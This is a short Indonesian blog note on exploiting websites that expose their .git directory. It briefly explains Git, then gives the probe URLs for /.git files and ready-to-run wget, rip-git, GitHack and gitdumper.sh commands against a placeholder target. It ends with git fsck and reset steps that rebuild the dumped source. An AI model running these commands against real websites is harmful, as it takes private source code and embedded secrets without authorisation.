Hey I Found Git Repository
PRAKATA
Hanya sebuah catatan kecil ketika menemukan sebuah git repository yang terekspose pada sebuah website
KATA
Git adalah version control system yang digunakan para developer untuk mengembangkan software secara bersama-bersama. Fungsi utama git yaitu mengatur versi dari source code program anda dengan mengasih tanda baris dan code mana yang ditambah atau diganti. Git akan membuat sebuah dotfiles (.git), yang berisikan semua datanya termasuk source code yang sudah di commit, maka dari itu lebih baik git repository lebih baik dirouting atau ditutup aksesnya dari luar, kenapa ? jika tidak maka hal buruk kemungkinan terjadi
-
Menemukan git repository
Sangat mudah, hanya perlu melakukan request kepada file-file default git, jika terdownload maka bisa dipastikan bahwa ada git repository disana, request ketarget.xyz/.git/config, target.xyz/.git/description, target.xyz/.git/HEAD
-
Melakukan cloning pada git repository
Jika directory listing dinyalakan, cukup menggunakanwget -r target.xyz/.git/
Jika directory listing dimatikan, gunakan bantuan tools dari dvcs-ripper, GitHack, gitdumper.sh.
rip-git -v -u "target.xyz/.git"
python2 GitHack.py http://target.xyz/.git/
bash gitdumper.sh http://target.xyz/.git/ dump-git
-
Melakukan checkout atau ekstrasi source code dari git repository
Beberapa tools sudah otomatis melakukan ekstrasi source code dari git repo, namun jika tidak secara otomatis melakukan ekstrasi source kita bisa melakukannya secara manual pertama melakukan checking hash terdapat file git yang telah terdownload,git fsck
lalu melanjutkan dengan,git reset --hard HEAD
PASCAKATA
And source code sudah terambil
Thanks, semoga catatan ini berguna bagi kalian, jika ada tambahan atau koreksi silahkan taruh pada section comment :D
-Fin